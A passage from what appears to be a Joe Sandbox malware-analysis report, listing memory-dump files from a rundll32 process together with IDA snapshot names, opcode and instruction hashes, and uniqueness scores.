                          • Associated: 00000011.00000002.1840345674.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000011.00000002.1840377836.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000011.00000002.1840377836.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000011.00000002.1840429349.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000011.00000002.1840537132.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000011.00000002.1840578040.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000011.00000002.1840602405.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000011.00000002.1840627209.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000011.00000002.1840653470.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000011.00000002.1840672225.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000011.00000002.1840672225.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_400000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7a7d775f2f31171e9fdc6f9a2d88efd9136b6ab3ceaa150b0c732618665457cd
                          • Instruction ID: 43e2e41ca933135a76ff93088d0e918a0ccdcc9e2d3f64ee52f22439fc26371c
                          • Opcode Fuzzy Hash: 7a7d775f2f31171e9fdc6f9a2d88efd9136b6ab3ceaa150b0c732618665457cd
                          • Instruction Fuzzy Hash: B6F01736601A85DACB24DF36E8807D83764F75938CF50402AFA5D87B18DB34C69ACB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000011.00000001.1735477150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_1_401000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5313ac8dcfd6aff18ad436b64c8517226814e4589e6c8eb98e893eb4249e838c
                          • Instruction ID: 1bc81c925e39cc1c392e4084ddf3db8ababac465a92711de055ded577be46b60
                          • Opcode Fuzzy Hash: 5313ac8dcfd6aff18ad436b64c8517226814e4589e6c8eb98e893eb4249e838c
                          • Instruction Fuzzy Hash: DCD0A720715E0B0BFB687AEE1CEE1361080D738206310003B9915D5293E9A8CC46924D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000011.00000001.1735477150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_1_401000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e3586106831d5749ebdc5f2d497c5695c542f665bca583d4ac9db92e84bbac6
                          • Instruction ID: 1ed05d76bcfbe8ca552233208a9fcaacfb0212544dfc01b58dfcbfe2ce1027a5
                          • Opcode Fuzzy Hash: 1e3586106831d5749ebdc5f2d497c5695c542f665bca583d4ac9db92e84bbac6
                          • Instruction Fuzzy Hash: C9B0925072AD0C0B5BA8A6FF08EA27490D4D26C01A75010BFA419C63A2E98A48E88345
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000011.00000001.1735477150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_1_401000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0cfa698748bb64cedbfea9c0ae8b152c64f619fa36b2ae3542f32198d6df4e9
                          • Instruction ID: 21ac2a481705a99f5833024b097cff2b5eb32e4b948c073529bab5dd0ea454cf
                          • Opcode Fuzzy Hash: a0cfa698748bb64cedbfea9c0ae8b152c64f619fa36b2ae3542f32198d6df4e9
                          • Instruction Fuzzy Hash: B5B09239468EC847CA02B734C94248A72B2FA90B08F800619F48692190ED2D9A2887C6
                          Uniqueness

                          Uniqueness Score: -1.00%